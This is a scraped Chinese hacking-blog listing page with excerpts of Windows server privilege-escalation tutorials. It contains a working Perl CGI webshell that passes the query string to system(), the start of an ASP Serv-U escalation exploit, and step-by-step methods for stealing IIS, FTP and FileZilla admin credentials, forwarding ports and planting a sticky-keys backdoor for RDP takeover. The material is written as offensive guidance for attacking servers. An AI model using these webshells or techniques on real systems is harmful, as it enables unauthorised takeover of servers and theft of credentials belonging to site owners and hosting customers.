查看更多...

Tags: 星外主机 提权 可写 目录

Windows7/win2008 提权0day

查看更多...

Tags: 0day win7 提权

或许用过aspx大马的人知道一般aspx大马都有一个功能叫做"iis spy"，它的作用就是列出服务器上面所有网站的信息，包括用户名，密码，路径以及捆绑的域名。

一般我们要是做旁注的时候只需要看目标网站在哪个路径下面然后尝试跳转过去或者cacls改下权限（我用的前一个服务器竟然就有这样的问题，直接cacls就可以修改权限，我自己给自己送了个webshell竟然还可以旁别人的，着实被恶心一下。）。

而且很多情况下，iis密码是乱码的，这我没有仔细研究过是不是随即产生的。但要是密码不是乱码的话你就要注意了，说不定这个密码和用户名就可以用来登陆ftp。不妨试下。上次一个shell把我深深地雷到了，管理员的密码竟然也这样暴露在阳光下。操到3389里登陆，提权都免了。

iis spy的作用主要就这两个了。

查看更多...

Tags: 提权 iis

serv-u提权使用前提:管理员没有设置本地管理密码.如果设置了,可以在serv-u安装目录\Users\Local Administrator Domain\.Archive里面找到一个MD5值,是前两位随机字符+MD5.破出来后减去前两位随机字符就是本地管理密码.如果管理员没有设置,在exp的第一页随便填什么密码都可以进去.建立好域的时候要等半分钟才能登陆.不然会出现错误.

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function

Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function

Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
    ''----------自定义参数开始-----------

查看更多...

Tags: 提权 本地

　　Perl 语言由 Larry Wall 创建，最初作为一种实用解释语言。其主要功能最初是用于分析基于文本的数据和生成这些数据的统计或结果。随着 Internet 的普及推广，我们已经感受到 Perl 在 CGI 编程和处理格式数据上的强大功能。由于 Perl 对 process、文档和文字有很强的处理、变换能力，因此凡是有关快速原型设计、系统工具、软件工具、系统管理、资料库连结、图像程式设计、网络连结和 WWW 程式设计等之类的任务，都特别适合用 Perl 来完成

c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, "

\r\n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "\r\n\r\n", 17);

close(STDERR);

close(STDOUT);

exit;

保存为cmd.pl上传至BIN目录执行,

(如果不能运行，可以试试改为cgi 扩展呢，把刚才的 pl文件改为 cgi文件)

在IE浏览窗口中提交提交 http://anyhost//cmd.pl?dir 即可开始执行命令,请注意这个SHELL是具有ADMIN权限的,能够添加帐号并加入管理员组,书写规则是在?后加入你需要执行的命令.

为什么安装PERL能导至黑客在服务器上提升权限呢?原理很简单,因为PERL在默认安装时BIN目录是具有EVERYONE的完全控制权限和CGI执行权限的,所以能执行任意命令,这是一个NTFS权限导至的提权漏洞.

查看更多...

Tags: 权限 黑客 提权 脚本

事情的起因:一次拿到一个个人讲师的webshell，想提权，服务器权限设置的不严，但是提权不好提，只有一个C盘，也没装什么软件,没 mysql,mssql，su，360等一些熟悉的提权软件。执行下命令看看吧！netstat -an看到有个默认的端口14147网上搜了下原来是一款叫做FileZilla的FTP软件的一个管理端口。网上搜了下FileZilla提权，还真有http://xiaoyi.us/archFPipe.exeives/230。用了此上说的方法，但是始终连接不上，可能真的像作者说的对与网络的带宽的要求很高，或者是硬防的问题。但是自己后来想，serv-U能通过lcx直接转发，然后本地连接，为什么还要用FPipe.exe这东西呢！重新试了下，转发的太少了，还是网速问题。5秒左右才返回一个5bytes数据包给本地。难道这个办法不行？不死心在虚拟机实验了。成功了，就有了此文。
首先找到FileZilla的安装目录，打开FileZilla Server Interface.xml，里面有管理口令

在虚拟机里进行转发如下图

这里使用的本地IP是127.0.0.1因为FileZilla的管理IP地址只能是127.0.0.1
转发成功了，返回信息

接下来就是用FileZilla客户端来连接了

嘿嘿，连接成功

接下来就是添加用户，设置目录为C盘,权限设置为完全控制即可


FileZilla Server不比serv-U，可以quote site exec执行dos命令，要实现提权的话可以FTP登录上去操作文件管理，如替换系统服务、替换系统文件、将程序置于启动目录等等。
我这里就替换粘贴键了，3389登陆，5下shift拿下服务器。

查看更多...

Tags: 教程 权限 提权 ftp 软件 ftp

查看更多...

Tags: webshell 提权 教程 权限 黑客

查看更多...

Tags: gene6 ftp server ftp 软件 提权 权限 黑客

查看更多...

Tags: 权限 提权 命令

查看更多...

Tags: 权限 黑客 提权 webshell